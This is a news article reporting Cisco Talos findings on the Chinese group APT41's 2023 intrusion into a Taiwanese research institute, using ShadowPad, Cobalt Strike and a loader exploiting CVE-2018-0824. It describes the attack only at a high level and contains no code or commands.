Chinese APT41 Group Breaches Taiwan Research Institute for Cyber Espionage

August 2, 2024

APT41, a state-sponsored Chinese threat actor, has reportedly infiltrated a Taiwanese research institute affiliated with the government. The institute is known for its research on advanced computing and related technologies. The cyber intrusion began in July 2023, with the threat actors gaining initial access through unspecified means. The group deployed various malware tools, including the notorious ShadowPad remote access Trojan (RAT), the Cobalt Strike post-compromise tool, and a custom loader that injects malware using a 2018 Windows remote code execution vulnerability (CVE-2018-0824).

APT41 is a designation used by several vendors to track a loose collection of China-affiliated threat groups involved in wide-ranging cyber espionage and financially motivated cyberattacks worldwide since 2012. Sub-groups such as Wicked Panda, Winnti, Barium, and SuckFly have been implicated in the theft of trade secrets, intellectual property, and other sensitive data from organizations in the US and other countries. The group has most recently been observed targeting global shipping and logistics companies, as well as organizations in the tech, entertainment, and automotive sectors. Despite the US government indicting several members of the Chengdu-based APT41 in 2020, the group's activities persist unabated.

The intrusion into the Taiwanese research institute was discovered by Cisco Talos researchers during an investigation into unusual activity related to attempts to download and execute PowerShell scripts in the institute's network environment. "The nature of research-and-development work carried out by the entity makes it a valuable target for threat actors dedicated to obtaining proprietary and sensitive technologies of interest to them," stated Talos researchers Joey Chen, Ashley Shen, and Vitor Ventura in a recent report. During the intrusion, APT41 actors breached three systems and stole a number of documents.

ShadowPad, a malware first discovered in the source code of NetSarang Computer's Xmanager server management software in 2017, was initially believed to be exclusively used by APT41. However, over time, multiple China-linked groups have been identified as using the RAT in numerous cyber-espionage campaigns and software supply chain attacks. In the attack on the Taiwanese research institute, APT41 used two different iterations of ShadowPad. The attackers used ShadowPad to map out the victim network, collect data on hosts, and identify other exploitable systems on the same network. The APT was also found to be harvesting passwords and user credentials stored in web browsers from the compromised environment, using tools such as Mimikatz and WebBrowserPassView.

As part of their attack chain, the threat actors also deployed the Cobalt Strike post-compromise tool on the victim network using a loader they cloned from a GitHub project. This was designed to evade antivirus detection tools. "It’s important to highlight that this Cobalt Strike beacon shellcode used steganography to hide in a picture and executed by this loader," the researchers noted. "In other words, its download, decryption, and execution routines all happen in runtime in memory."

Latest News

• CISA Issues Warning Over VMware ESXi Bug Exploited in Ransomware Attacks
• Black Basta Ransomware Group Adapts with Custom Tools and Malware
• UK Electoral Commission Breach Tied to Unpatched Exchange Server Vulnerabilities
• SideWinder Cyber Attacks Target Maritime Facilities Across Multiple Countries
• New 'Specula' Tool Exploits Outlook for Remote Code Execution